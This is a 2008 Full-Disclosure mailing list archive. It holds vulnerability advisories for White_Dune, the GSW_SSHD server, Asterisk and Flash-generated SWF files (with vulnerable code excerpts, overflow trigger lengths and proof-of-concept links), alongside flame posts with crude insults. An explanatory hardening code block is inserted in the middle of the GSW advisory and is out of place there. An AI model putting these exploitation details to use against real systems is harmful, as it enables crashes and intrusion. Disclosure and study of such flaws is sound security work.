>
> Apparently, too much admiration of a single web application security scanning vendor can be a bad thing. Larry Suto has only ever worked with Eric Caso at NTObjectives.
>
> Adam Muntner has been a customer of several CWE-Compatible and aspiring companies out there.
> He has a balanced view of both the commercial tools and the open-source world, as well as building his own tools from scratch as the need may be.
>
> > You must be a cissp because you take yourself and the internet very seriously. I am pretty sure no one cares about your opinion either.
>
> Wrong again; as always.
>
> Cheers,
> Andre

From Valdis.Kletnieks at vt.edu Wed Jan 2 19:32:30 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Wed, 02 Jan 2008 14:32:30 -0500
Subject: [Full-disclosure] Was secreview crap - now OpenVMS!!
In-Reply-To: Your message of "Wed, 02 Jan 2008 14:13:48 EST." <452214.1315441199301228241.JavaMail.servlet@perfora>
References: <452214.1315441199301228241.JavaMail.servlet@perfora>
Message-ID: <25233.1199302350@turing-police.cc.vt.edu>

On Wed, 02 Jan 2008 14:13:48 EST, "Randal T. Rioux" said:
> OpenVMS is less than 40% Blissful...

Obviously, it's migrated over the years. Back in the late 80's when it was at its most prevalent (and before it got 'Open' attached to it - we're talking Big Grey Wall and Big Orange Wall era here), it was pretty heavily Bliss32..

> Security relevance: UNHACKABLE!

WANK! (The old-timers will know what that means, and it's not what you newbies think... ;)
From reepex at gmail.com Wed Jan 2 19:34:40 2008
From: reepex at gmail.com (reepex)
Date: Wed, 2 Jan 2008 13:34:40 -0600
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] QuietMove ( D - )
In-Reply-To: <22264.1199299161@turing-police.cc.vt.edu>
References: <1199135608713.cf608afc-1199-4eee-948b-dcb5f8fd579a@google.com> <1199206656.15507.12.camel@thinker.ph.cox.net> <22264.1199299161@turing-police.cc.vt.edu>
Message-ID:

If you noticed, he was reading Tanenbaum's book about Minix. If you would look at the book you would see he relies heavily on source code and actually has the code in the back of the book so that he can refer to it constantly. In other books I agree you do not have to know C, but for this book, if you do not know C, you will end up understanding at a very very high level what message passing is and that's about it.

On Jan 2, 2008 12:39 PM, wrote:
> On Tue, 01 Jan 2008 12:33:36 CST, reepex said:
> > Is this list up to date? It makes it seem as if you are learning basic linux commands, sed, and basic perl. Also why are you reading operating system design and implementation when you do not know C?
>
> C is not a prerequisite for understanding operating systems design. It's only needed if the particular operating system you're working with implements its internals in C.
>
> What is more important is understanding the *concepts* - things like locking, and race conditions, and how fine-grained locking you need/want for a filesystem. Having one big lock is a lot easier, but causes contention - having a lot of little locks can cause deadlocks, especially in error handlers.
> What does the filesystem code do if (for example) it gets 2/3 of the way through the rename of a file, and encounters an I/O error while writing out the removal of the old name of the file? What are the trade-offs required for an operating system to support jitter-free multimedia applications (the first thing to learn is that throughput, latency, and jitter are intertwined, and it's very difficult to do all 3 well at the same time)?
>
> It's also important to understand that there are approaches other than Windows and Unix/Linux - IBM's VM and MVS systems have been around for a long time, and have a lot to tell us about other choices that can be made. There's still a lot of VMS running out there in scattered corners as well - and that system had a lot of concepts that one should understand, at least well enough to know why "my favorite system didn't do it that way because..." (Hint - consider how and why SYS$FOO variables worked in VMS, and why they're so hard to get working correctly under Linux - they're *not* exactly the same as Unix/Linux environment variables, and as such provide both problems and solutions that environment variables don't).
>
> Bonus points for knowing that VMS was mostly written in Bliss/32 or some such, and VM and MVS were a mixture of assembler and (later on) PL/S. No C knowledge needed for those critters...
>
> Even when the system *is* written in C, you don't need to be a C guru to understand what's going on. Maurice Bach's "The Design of the Unix Operating System" is probably one of the classic texts - but you don't need to know C any better than "read C code snippet as pseudocode" to follow it.
From reepex at gmail.com Wed Jan 2 19:48:13 2008
From: reepex at gmail.com (reepex)
Date: Wed, 2 Jan 2008 13:48:13 -0600
Subject: [Full-disclosure] Was secreview crap - now OpenVMS!!
In-Reply-To: <25233.1199302350@turing-police.cc.vt.edu>
References: <452214.1315441199301228241.JavaMail.servlet@perfora> <25233.1199302350@turing-police.cc.vt.edu>
Message-ID:

It's funny how you always talk about other people (like a few days ago when you were amazed that people exploited an off by one), and talk about "the old times"... sure signs of someone washed up, as evident by your non-productiveness in the last few years (and no - spamming mailing lists does not count).

On Jan 2, 2008 1:32 PM, wrote:
> On Wed, 02 Jan 2008 14:13:48 EST, "Randal T. Rioux" said:
> > OpenVMS is less than 40% Blissful...
>
> Obviously, it's migrated over the years. Back in the late 80's when it was at its most prevalent (and before it got 'Open' attached to it - we're talking Big Grey Wall and Big Orange Wall era here), it was pretty heavily Bliss32..
>
> > Security relevance: UNHACKABLE!
>
> WANK! (The old-timers will know what that means, and it's not what you newbies think... ;)
From aluigi at autistici.org Wed Jan 2 19:55:33 2008
From: aluigi at autistici.org (Luigi Auriemma)
Date: Wed, 2 Jan 2008 20:55:33 +0100
Subject: [Full-disclosure] Buffer-overflow and format string in White_Dune 0.29beta791
Message-ID: <20080102205533.7bcf8834.aluigi@autistici.org>

#######################################################################

                             Luigi Auriemma

Application:  White_Dune
              http://vrml.cip.ica.uni-stuttgart.de/dune/
Versions:     <= 0.29beta791
Platforms:    Unix/Linux/MacOSX and Windows
Bugs:         A] buffer-overflow in Scene::errorf
              B] format string in ImportFile
Exploitation: local
Date:         02 Jan 2008
Author:       Luigi Auriemma
              e-mail: aluigi at autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bugs
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

White_Dune is an open source editor/viewer for VRML97 files.

#######################################################################

=======
2) Bugs
=======

-----------------------------------
A] buffer-overflow in Scene::errorf
-----------------------------------

A buffer-overflow vulnerability is located in the function which builds the error messages for the problems that happened during the parsing of the WRL file.

From Scene.cpp:

  void Scene::errorf(const char *fmt, ...)
  {
      va_list ap;
      char buf[1024], buf2[1024];
      const char *url = "";

      va_start(ap, fmt);
      vsprintf(buf, fmt, ap);            // unbounded: no size limit on buf
      if (TheApp->getImportURL() != NULL)
          url = TheApp->getImportURL();
      mysnprintf(buf2, 1024, "%s %d: %s", url, lineno, buf);
      _compileErrors += buf2;
  }

------------------------------
B] format string in ImportFile
------------------------------

Another problem related to the handling of the errors.
After the building of the error message the parse() function returns immediately and swDebugf() is called for visualizing it to stderr or to the debugger without using the needed format argument required by the function.

From DuneApp.cpp:

  DuneApp::ImportFile(const char *openpath, Scene* scene, bool protoLibrary, Node *node, int field)
  ...
      if (errors[0]) {
          swMessageBox(_mainWnd, errors, "Parse Errors", SW_MB_OK, SW_MB_WARNING);
          swDebugf(errors);              // errors is passed as the format string
  ...

#######################################################################

===========
3) The Code
===========

http://aluigi.org/poc/whitedunboffs.zip

#######################################################################

======
4) Fix
======

Version 0.29beta795

#######################################################################

---
Luigi Auriemma
http://aluigi.org

From aluigi at autistici.org Wed Jan 2 19:55:57 2008
From: aluigi at autistici.org (Luigi Auriemma)
Date: Wed, 2 Jan 2008 20:55:57 +0100
Subject: [Full-disclosure] Multiple vulnerabilities in Georgia SoftWorks SSH2 Server 7.01.0003
Message-ID: <20080102205557.cff7307a.aluigi@autistici.org>

#######################################################################

                             Luigi Auriemma

Application:  Georgia SoftWorks SSH2 Server (GSW_SSHD)
              http://www.georgiasoftworks.com/prod_ssh2/ssh2_server.htm
Versions:     <= 7.01.0003
Platforms:    Windows
Bugs:         A] format string in the log function
              B] buffer-overflow in the log function
              C] buffer-overflow in the handling of the password
Exploitation: remote
Date:         02 Jan 2008
Author:       Luigi Auriemma
              e-mail: aluigi at autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bugs
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

GSW_SSHD is a well known commercial SSH server which acts as an SSH tunnel for the telnet server GS_Tnet.exe.
#######################################################################

=======
2) Bugs
=======

------------------------------------
A] format string in the log function
------------------------------------

The logging function used by the server is affected by a format string vulnerability caused by the usage of vsprintf for building the first message (like "LoginPassword(%s(%s)[%u])") and the usage of another vsprintf for building the final log entry. The bug can be exploited through the username field.

--------------------------------------
B] buffer-overflow in the log function
--------------------------------------

A buffer-overflow vulnerability is located in the same logging function. It's enough to use a username longer than 10000 chars to exploit the vulnerability.

--------------------------------------------------
C] buffer-overflow in the handling of the password
--------------------------------------------------

The server is also affected by another buffer-overflow, this time located in the instructions which handle the password supplied by the client, exploitable through a string longer than 800 chars.
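The White_Dune and GSW_SSHD advisories above describe the same two defect classes in an error/log formatter: an unbounded vsprintf into a fixed buffer, and user-derived text reaching a printf-style function as the format. The following C is an added example, not code from either project or from the linked proof-of-concept archives; it shows the bounded, data-only form a reviewer would expect instead. safe_errorf and log_login_event are hypothetical names and all inputs are constructed.

```c
/* Added example, not code from White_Dune, GSW_SSHD or the linked proofs of
 * concept: a bounded two-stage error/log formatter that avoids both defect
 * classes the advisories describe.
 *  - buffer overflow: vsprintf() into a fixed char buf[1024] is replaced by
 *    vsnprintf() with the buffer size, and truncation is reported;
 *  - format string: caller-supplied text (a username, a parse error string)
 *    is only ever consumed through a "%s" conversion, never used as fmt,
 *    so "%n" or "%x" sequences inside it remain inert data.
 * safe_errorf and log_login_event are hypothetical names. */
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define ERRBUF 1024   /* same stage-buffer size as Scene::errorf above */

/* Formats "url lineno: message" into out (always NUL-terminated) and returns
 * the length stored, excluding the NUL. *truncated becomes 1 when either
 * stage had to cut the text. */
static size_t safe_errorf(char *out, size_t outsz, int *truncated,
                          const char *url, int lineno, const char *fmt, ...)
{
    char msg[ERRBUF];
    va_list ap;
    int n;

    *truncated = 0;
    if (outsz == 0)
        return 0;

    /* Stage 1: bounded formatting of the caller's message. vsnprintf()
     * returns the length the full text would have had, so n >= sizeof msg
     * means it was cut rather than written past the buffer. */
    va_start(ap, fmt);
    n = vsnprintf(msg, sizeof msg, fmt, ap);
    va_end(ap);
    if (n < 0) {
        out[0] = '\0';
        return 0;
    }
    if ((size_t)n >= sizeof msg)
        *truncated = 1;

    /* Stage 2: the already-formatted text goes in through %s. This is the
     * step both advisories describe as a second vsprintf over attacker-
     * influenced text; here that text cannot be read as a format. */
    n = snprintf(out, outsz, "%s %d: %s", url ? url : "", lineno, msg);
    if (n < 0) {
        out[0] = '\0';
        return 0;
    }
    if ((size_t)n >= outsz) {
        *truncated = 1;
        return outsz - 1;
    }
    return (size_t)n;
}

/* Mirrors the GSW log entry "LoginPassword(%s(%s)[%u])": the username comes
 * from the remote client and is a %s argument, not the format string. */
static size_t log_login_event(char *out, size_t outsz, int *truncated,
                              const char *user, const char *host, unsigned port)
{
    return safe_errorf(out, outsz, truncated, "sshd", 0,
                       "LoginPassword(%s(%s)[%u])", user, host, port);
}

/* Constructed check: a username longer than the 10000 chars named in bug B.
 * Returns 1 when the result was truncated, stayed inside the output buffer
 * and is NUL-terminated at the reported length. */
int check_long_username(void)
{
    static char name[20000];
    char out[ERRBUF + 64];
    int trunc;
    size_t n;

    memset(name, 'A', sizeof name - 1);
    name[sizeof name - 1] = '\0';
    n = log_login_event(out, sizeof out, &trunc, name, "10.0.0.5", 22);
    return trunc == 1 && n < sizeof out && strlen(out) == n;
}

/* Constructed check: a username carrying format directives is logged as
 * literal text. Returns 0 when the log line matches exactly. */
int check_format_directives(void)
{
    char out[ERRBUF + 64];
    int trunc;

    log_login_event(out, sizeof out, &trunc, "%n%n%x", "10.0.0.5", 22);
    return strcmp(out, "sshd 0: LoginPassword(%n%n%x(10.0.0.5)[22])") || trunc;
}

int main(void)
{
    printf("long username bounded: %s\n", check_long_username() ? "yes" : "no");
    printf("directives stay inert: %s\n", check_format_directives() == 0 ? "yes" : "no");
    return 0;
}
```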
#######################################################################

===========
3) The Code
===========

http://aluigi.org/poc/gswsshit.zip

#######################################################################

======
4) Fix
======

No fix

#######################################################################

---
Luigi Auriemma
http://aluigi.org

From tremaine at gmail.com Wed Jan 2 20:05:19 2008
From: tremaine at gmail.com (Tremaine Lea)
Date: Wed, 2 Jan 2008 13:05:19 -0700
Subject: [Full-disclosure] Secreview re-review of quietmove ( F ---)
In-Reply-To: <20080102180813.C5B5050038@mailserver9.hushmail.com>
References: <20080102180813.C5B5050038@mailserver9.hushmail.com>
Message-ID: <6d456c360801021205v3ff661c7x8caeffc494b71464@mail.gmail.com>

Regardless of whether your intentions are good or not in performing these reviews, one thing is crystal clear. In order to perform these reviews and have them accepted by those who would actually read and depend on them to a degree, you need to have established yourself as a credible source and have a good reputation.

With that in mind, I think the vast majority will continue to rely on word of mouth from peers, or well respected and long standing companies such as Gartner or even Dark Reading. In my not so humble opinion, you will not establish yourself as a credible resource by engaging in petty disputes and mud slinging on FD.

Worse, it becomes more and more apparent that this is essentially an attempt to drive interest to your blog. I don't believe any serious company would engage in the behaviour you have to date, so both your motives and your method are in question. If you genuinely wish to be taken seriously and treated as a credible source of information about other security vendors, I'd consider starting again from scratch and develop a better method of attracting professional interest. The key is to attract the attention, not try and push your product down throats.
Another quick lesson: if a vendor doesn't provide you with information, the correct thing to do is simply note that you were unable to review their product or services, and why. To still attempt a review with seriously incomplete information and then give a low score is irresponsible at best.

--
Tremaine Lea
Network Security Consultant
Intrepid ACL
"Paranoia for hire"

On Jan 2, 2008 11:08 AM, SecReview wrote:
> Hi Adam,
>
> We've said this before and will say this again, this time to everyone.
>
> We would be more than happy to give your company (QuietMove) a "better" review if you'd enable us to do that. So far you haven't helped us to effectively review you at all. We tried to call you before our initial review, but never got hold of anyone. We also sent you an email before writing our second review, and you never responded to any of the questions in that email. If you'd like us to do a better review then provide us with the information that you think we will need to get the job done.
>
> Our current review is the product of your website, emails that you've posted to this and other forums, and your reaction to our first review. We haven't been able to find anything related to major accomplishments by you or by QuietMove, we haven't seen any sample reports, and we haven't received any answers to any questions about your methodologies for service execution and delivery. We even think that our current review might be too harsh, but can't change anything without more information.
>
> If you want us to change our review, we can do that again and we can do it in a non-biased way (regardless of all the rants and noise). We need you to tell us about your service delivery methodologies, your reporting methodologies, how you define specific service offerings, what markets you play in, and if possible sanitized sample reports. We won't publish any of that information directly, but we would use that to produce your next review.
>
> We want our reviews to accurately and truthfully reflect the quality and professionalism of the providers that we study. (In fact, if anyone has any suggestions as to how we could better "rank" security companies we'd be more than happy to listen and consider those suggestions.)
>
> Hope this helps. This will be our last email about QuietMove unless you request a redo of the current review. We will only redo the review if you are able to provide us with accurate information to help us get it done. We think that you should do it, because we think that you can score much better than an F+. (You're clearly not an idiot and you do have at least some experience.)
>
> -the end.
>
> Regards,
> The Secreview Team
> http://secreview.blogspot.com

From nate.mcfeters at gmail.com Wed Jan 2 20:41:36 2008
From: nate.mcfeters at gmail.com (Nate McFeters)
Date: Wed, 2 Jan 2008 14:41:36 -0600
Subject: [Full-disclosure] Secreview re-review of quietmove ( F ---)
In-Reply-To: <6d456c360801021205v3ff661c7x8caeffc494b71464@mail.gmail.com>
References: <20080102180813.C5B5050038@mailserver9.hushmail.com> <6d456c360801021205v3ff661c7x8caeffc494b71464@mail.gmail.com>
Message-ID: <997ef2c20801021241q6563d51ai85390228bdb05128@mail.gmail.com>

Is anyone out there using these reviews? It's just amazing that we are still going through this. SecReview is busting Adam for not credentializing himself, but I see nothing of how they have credentialized what they are doing. It's absurd.

On 1/2/08, Tremaine Lea wrote:
> Regardless of whether your intentions are good or not in performing these reviews, one thing is crystal clear. In order to perform these reviews and have them accepted by those who would actually read and depend on them to a degree, you need to have established yourself as a credible source and have a good reputation.
>
> With that in mind, I think the vast majority will continue to rely on word of mouth from peers, or well respected and long standing companies such as Gartner or even Dark Reading. In my not so humble opinion, you will not establish yourself as a credible resource by engaging in petty disputes and mud slinging on FD.
>
> Worse, it becomes more and more apparent that this is essentially an attempt to drive interest to your blog. I don't believe any serious company would engage in the behaviour you have to date, so both your motives and your method are in question. If you genuinely wish to be taken seriously and treated as a credible source of information about other security vendors, I'd consider starting again from scratch and develop a better method of attracting professional interest. The key is to attract the attention, not try and push your product down throats.
>
> Another quick lesson: if a vendor doesn't provide you with information, the correct thing to do is simply note that you were unable to review their product or services, and why. To still attempt a review with seriously incomplete information and then give a low score is irresponsible at best.
>
> --
> Tremaine Lea
> Network Security Consultant
> Intrepid ACL
> "Paranoia for hire"
>
> On Jan 2, 2008 11:08 AM, SecReview wrote:
> > Hi Adam,
> >
> > We've said this before and will say this again, this time to everyone.
> >
> > We would be more than happy to give your company (QuietMove) a "better" review if you'd enable us to do that. So far you haven't helped us to effectively review you at all. We tried to call you before our initial review, but never got hold of anyone. We also sent you an email before writing our second review, and you never responded to any of the questions in that email. If you'd like us to do a better review then provide us with the information that you think we will need to get the job done.
> >
> > Our current review is the product of your website, emails that you've posted to this and other forums, and your reaction to our first review. We haven't been able to find anything related to major accomplishments by you or by QuietMove, we haven't seen any sample reports, and we haven't received any answers to any questions about your methodologies for service execution and delivery. We even think that our current review might be too harsh, but can't change anything without more information.
> >
> > If you want us to change our review, we can do that again and we can do it in a non-biased way (regardless of all the rants and noise). We need you to tell us about your service delivery methodologies, your reporting methodologies, how you define specific service offerings, what markets you play in, and if possible sanitized sample reports. We won't publish any of that information directly, but we would use that to produce your next review.
> >
> > We want our reviews to accurately and truthfully reflect the quality and professionalism of the providers that we study. (In fact, if anyone has any suggestions as to how we could better "rank" security companies we'd be more than happy to listen and consider those suggestions.)
> >
> > Hope this helps. This will be our last email about QuietMove unless you request a redo of the current review. We will only redo the review if you are able to provide us with accurate information to help us get it done. We think that you should do it, because we think that you can score much better than an F+. (You're clearly not an idiot and you do have at least some experience.)
> >
> > -the end.
> >
> > Regards,
> > The Secreview Team
> > http://secreview.blogspot.com
From worriedsecurity at googlemail.com Wed Jan 2 21:02:44 2008
From: worriedsecurity at googlemail.com (worried security)
Date: Wed, 2 Jan 2008 21:02:44 +0000
Subject: [Full-disclosure] Uber Lamer Ass of the Year. Vote!
In-Reply-To: <90865ed50712232059s27a419b3j33ae8857bcfa70e0@mail.gmail.com>
References: <5c9b0ff50712221426u3e2d6b39y6ba8696e6491af27@mail.gmail.com> <90865ed50712232059s27a419b3j33ae8857bcfa70e0@mail.gmail.com>
Message-ID: <67ea64530801021302s4b004496k9667bf86708fde45@mail.gmail.com>

On Dec 24, 2007 4:59 AM, damncon wrote:
> I'm still wondering which are n3td3v main skills, and I am not joking, I have only seen him posting links to government news, security news, etc.
>
> What really happens in n3td3v user group or whatever it is called?

We talk about things your mom wouldn't approve of and I'm not letting you sign up, na na na.

From Valdis.Kletnieks at vt.edu Wed Jan 2 21:55:02 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Wed, 02 Jan 2008 16:55:02 -0500
Subject: [Full-disclosure] Was secreview crap - now OpenVMS!!
In-Reply-To: Your message of "Wed, 02 Jan 2008 13:48:13 CST."
References: <452214.1315441199301228241.JavaMail.servlet@perfora> <25233.1199302350@turing-police.cc.vt.edu>
Message-ID: <718.1199310902@turing-police.cc.vt.edu>

On Wed, 02 Jan 2008 13:48:13 CST, you said:
> it's funny how you always talk about other people (like a few days ago when you were amazed that people exploited an off by one),

Actually, I was merely pointing out to a reader of the list that if you *can* get x'41414141' into the appropriate register, you can probably abuse it into a full exploit, and gave an example of an off-by-one-byte that produced such an exploit. Maybe in that reader's world, they can get away with asking "how is that exploitable?", but some of us have to classify that as "should be considered exploitable until proved otherwise".

> , and talk about "the old times"... sure signs of someone washed up as evident by your non-productiveness in the last few years

Failure to learn from the lessons of the past is a good way to shoot yourself in the foot exactly the same way. Yes - WANK was back in 1989. However, even now, almost 2 decades later, we're *still* seeing a lot of systems getting exploited for the *exact same* base cause. Additionally, it's proof that anybody who is just *now* waking up to the concept of "cyber-warfare" is 20 years behind:

http://marc.info/?l=isn&m=100707930117213&w=2

It's also a good idea to keep in mind that not everybody in the security industry measures "productivity" by "number of exploits published". For some of us who run production networks, "no incidents happened, and none of the users noticed a damned thing we did to ensure it" is the rarely attained Nirvana.
From security at asterisk.org Wed Jan 2 21:57:50 2008
From: security at asterisk.org (Asterisk Security Team)
Date: Wed, 02 Jan 2008 17:57:50 -0400
Subject: [Full-disclosure] AST-2008-001: Crash from transfer using BYE with Also header
Message-ID: <477C08DE.3090308@asterisk.org>

               Asterisk Project Security Advisory - AST-2008-001

+------------------------------------------------------------------------+
| Product             | Asterisk                                         |
|---------------------+--------------------------------------------------|
| Summary             | Remote Crash Vulnerability in SIP channel driver |
|---------------------+--------------------------------------------------|
| Nature of Advisory  | Denial of Service                                |
|---------------------+--------------------------------------------------|
| Susceptibility      | Remote Unauthenticated Sessions                  |
|---------------------+--------------------------------------------------|
| Severity            | Critical                                         |
|---------------------+--------------------------------------------------|
| Exploits Known      | No                                               |
|---------------------+--------------------------------------------------|
| Reported On         | December 26, 2007                                |
|---------------------+--------------------------------------------------|
| Reported By         | Grey VoIP (bugs.digium.com user greyvoip)        |
|---------------------+--------------------------------------------------|
| Posted On           | January 2, 2008                                  |
|---------------------+--------------------------------------------------|
| Last Updated On     | January 2, 2008                                  |
|---------------------+--------------------------------------------------|
| Advisory Contact    | Joshua Colp                                      |
|---------------------+--------------------------------------------------|
| CVE Name            |                                                  |
+------------------------------------------------------------------------+
+------------------------------------------------------------------------+
| Description | The handling of the BYE with Also transfer method was    |
|             | broken during the development of Asterisk 1.4. If a      |
|             | transfer attempt is made using this method the system    |
|             | will immediately crash upon handling the BYE message due |
|             | to trying to copy data into a NULL pointer. It is        |
|             | important to note that a dialog must have already been   |
|             | established and up in order for this to happen.          |
+------------------------------------------------------------------------+

+------------------------------------------------------------------------+
| Resolution  | A fix has been added so that the BYE with Also transfer  |
|             | method now properly allocates and uses the transfer data |
|             | structure. It will no longer try to copy data into a NULL|
|             | pointer and will operate properly.                       |
+------------------------------------------------------------------------+

+------------------------------------------------------------------------+
| Affected Versions                                                      |
|------------------------------------------------------------------------|
| Product                    | Release     |                             |
|                            | Series      |                             |
|----------------------------+-------------+-----------------------------|
| Asterisk Open Source       | 1.0.x       | Unaffected                  |
|----------------------------+-------------+-----------------------------|
| Asterisk Open Source       | 1.2.x       | Unaffected                  |
|----------------------------+-------------+-----------------------------|
| Asterisk Open Source       | 1.4.x       | All versions prior to       |
|                            |             | 1.4.17                      |
|----------------------------+-------------+-----------------------------|
| Asterisk Business Edition  | A.x.x       | Unaffected                  |
|----------------------------+-------------+-----------------------------|
| Asterisk Business Edition  | B.x.x       | Unaffected                  |
|----------------------------+-------------+-----------------------------|
| Asterisk Business Edition  | C.x.x       | All versions prior to       |
|                            |             | C.1.0-beta8                 |
|----------------------------+-------------+-----------------------------| | AsteriskNOW | pre-release | All versions prior to beta7 | |----------------------------+-------------+-----------------------------| | Asterisk Appliance | SVN | All versions prior to | | Developer Kit | | Asterisk 1.4 revision 95946 | |----------------------------+-------------+-----------------------------| | s800i (Asterisk Appliance) | 1.0.x | All versions prior to | | | | 1.0.3.4 | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Corrected In | |------------------------------------------------------------------------| | Product | Release | |---------------+--------------------------------------------------------| | Asterisk Open | 1.4.17, available from | | Source | http://downloads.digium.com/pub/telephony/asterisk | |---------------+--------------------------------------------------------| | Asterisk | C.1.0 | | Business | | | Edition | | |---------------+--------------------------------------------------------| | AsteriskNOW | Beta7, available from http://www.asterisknow.org/. | | | | | | Beta5 and Beta6 users can update using the system | | | update feature in the appliance control panel. | |---------------+--------------------------------------------------------| | Asterisk | Asterisk 1.4 revision 95946. Available by performing | | Appliance | an svn update of the AADK tree. 
| | Developer Kit | | |---------------+--------------------------------------------------------| | s800i | 1.0.3.4 | | (Asterisk | | | Appliance) | | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Links | http://bugs.digium.com/view.php?id=11637 | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Asterisk Project Security Advisories are posted at | | http://www.asterisk.org/security | | | | This document may be superseded by later versions; if so, the latest | | version will be posted at | | http://downloads.digium.com/pub/security/AST-2008-001.pdf and | | http://downloads.digium.com/pub/security/AST-2008-001.html | +------------------------------------------------------------------------+ +------------------------------------------------------------------------+ | Revision History | |------------------------------------------------------------------------| | Date | Editor | Revisions Made | |------------------+--------------------+--------------------------------| | 2008-01-02 | Joshua Colp | Initial Release | +------------------------------------------------------------------------+ Asterisk Project Security Advisory - AST-2008-001 Copyright (c) 2007 Digium, Inc. All Rights Reserved. Permission is hereby granted to distribute and publish this advisory in its original, unaltered form. From steven.mcgrath at chigeek.com Wed Jan 2 16:07:31 2008 From: steven.mcgrath at chigeek.com (Steven McGrath) Date: Wed, 2 Jan 2008 10:07:31 -0600 Subject: [Full-disclosure] January 4th Chicago 2600 Meeting Information Message-ID: <28326b7c0801020807y15a9ab1cg76844186cd98f190@mail.gmail.com> The January Chicago 2600/DefCon 312 Meeting is near! 
The meeting will be Friday, January 4th at the Neighborhood Boys and Girls Club and will feature much of the same usual fun that all of you have grown to expect!

REQUIREMENTS:
* Laptop (Mac/Linux/Windows) capable of running VMWare
  OR
* Laptop with full Ruby on Rails and ruby-sqllite3 installed.

[Presentation Information]
- 9:00pm - Distributed Nmap: How to Automate Scans for an Environment - Tentative - Jax By Jaku
- After hours - Wii, Music, Socializing, etc.

[General Information]
- Meeting Time: 7.00pm - Approx. 3-5am
- Meeting Date: Friday, January 4th
- Place : 2501 W Irving Park Road, Chicago
- More Info : http://chicago2600.net

From 31415926 at hush.ai Wed Jan 2 16:46:28 2008
From: 31415926 at hush.ai (31415926 at hush.ai)
Date: Wed, 02 Jan 2008 16:46:28 +0000
Subject: [Full-disclosure] Critical Vulnerability in [Full-Disclosure]
Message-ID: <20080102164630.F3980118039@mailserver5.hushmail.com>

Critical Vulnerability in [Full-Disclosure]

The problem with full disclosure is that everyone feels the need to fully disclose, even when their opinion and the information they are purporting to impart is, well, bollocks. You can't tell them to shut up as they think they're important and the internet gives them balls of steel and verbal diarrhoea, so we stumble from one tired flamewar to another with no useful content being published.

It's embarrassing.

I'm an advocate of FD as a concept. I believe that there is no such thing as an innocent on the internet and if you really are that dumb, then you deserve everything you get. FD (as one of many like-minded lists) forces the vendors to patch or die and eventually write quality code. FD (the concept, not the list) is the ultimate nuclear deterrent, without the mutually assured destruction lunacy.

I have watched the posters to this list for some time.
By far the vast majority are transparently kiddies, sitting on their painted-up laptops thinking of themselves as the techno-brats in the film "Hackers" and hoping to grow up to be like the guy in the film "Swordfish". They write in l33t5p34k and think that this somehow makes them informed. Kiddies are the lowest form of life in the hierarchy of information security and in the IT industry generally.

You know who you are and so does everyone else. You are fools, and an embarrassment to the craft:

Secreview (review of products/services you have never bought, are you the goatse.cz receiver?)
Reepex (Isn't a reepex a bit of farm machinery?)
Gobbles (A nickname for a gay male prostitute)
Morning Wood (The holy grail of the viagra-abuser)
Gmaggro ("high value target selection", are you completely cocking stupid?)

Oh, the outrage.

I can see it now. There will be armies of skiddies demanding that the l33tz hack this f at cker, spam him, pwn him, and post defamatory messages concerning her skills and possible employment opportunities for her and her mother everywhere possible. Guess what, kids? I don't care.

No, not even a little bit. Do what you like, I could care less and no one else cares if you live or die tonight, you sad, acne'd little dewdrops.

Calmed down yet?

Good. I want you to consider something.

The FD list consists of the following content (and what it has to say):

Advisories by vendors (we fixed this)
Advisories by individuals (I tested that and found this)
Advisories by infosec organisations (we found this)
Funnies (self explanatory)
Opinions (this sucks, what about that?)
Skids (I did this, aren't I great, everyone else sucks?)
Trolls (you suck)
Trawlers (I have something 0day to buy or sell)

The top three (ie the useful content) is available in any one of a hundred places, the bottom three are noise. The only people interested in the noise are those who keep track of it for a living.
So, consider that by posting anything in the bottom three categories, you are drawing the attention of those who take an interest in your sad efforts to destabilise the technical crutch of society. These people are better than you in every important way, and if you so much as tiptoe across one of their lines, you'll wind up sharing a cell with a 7ft gorilla called George with a dead mouse and a pressing need to dry-cornhole your ringpiece 3 times a night and twice on Sundays. Do yourselves a favour and STFU.

What's left?

The funnies and the opinions. I've laughed my tits off at posts by Mssrs Coderman, Diggle, Dripping, VanWinkle and Mengele, and I've been interested by a few others who will remain nameless as I can't list them all. Long live full disclosure, but keep in mind that you're only legends in your own bedrooms.

later, pi

--
Click to get a free auto insurance quotes from top companies.
http://tagline.hushmail.com/fc/Ioyw6h4d8EIl5uJlSoB5C7HKVmuBsQOXlKB8YUus2MT2FpMkQCNmCM/

From rcannings at gmail.com Wed Jan 2 18:54:18 2008
From: rcannings at gmail.com (rich cannings)
Date: Wed, 2 Jan 2008 10:54:18 -0800
Subject: [Full-disclosure] XSS Vulnerabilities in Common Shockwave Flash Files
Message-ID: <884d17920801021054k3b2a8b9t1a4cbe64f0bac800@mail.gmail.com>

Hi.

Recently, there has been news regarding Flash authoring tools and XSS, but the articles contained little technical information. So, I created a detailed report at:

http://docs.google.com/Doc?docid=ajfxntc4dmsq_14dt57ssdw

An abbreviated version intended for full-disclosure, bugtraq, and websecurity lists is below.

SUMMARY

Critical vulnerabilities exist in a large number of widely used web authoring tools that automatically generate Shockwave Flash (SWF) files, such as Adobe (r) Dreamweaver (r), Adobe Acrobat (r) Connect (tm) (formerly Macromedia Breeze), InfoSoft FusionCharts, and Techsmith Camtasia. The flaws render websites that host these generated SWF files vulnerable to Cross-Site Scripting (XSS).
This problem is not limited to authoring tools. Autodemo, a popular service provider, used a vulnerable controller SWF in many of their projects. Simple Google hacking queries reveal that hundreds of thousands of SWFs are vulnerable on the Internet, and a considerable percentage of major Internet sites are affected.

We are only reporting XSS vulnerabilities that have been fixed by the vendors.

THE PROBLEM

Many web authoring tools that automatically generate SWFs insert identical and vulnerable ActionScript into all saved SWFs or necessary controller SWFs (think of tools that "save as SWF", "export to SWF", etc.). The vulnerable ActionScript can be used by attackers to execute arbitrary JavaScript in the security domain of the website hosting the SWF.

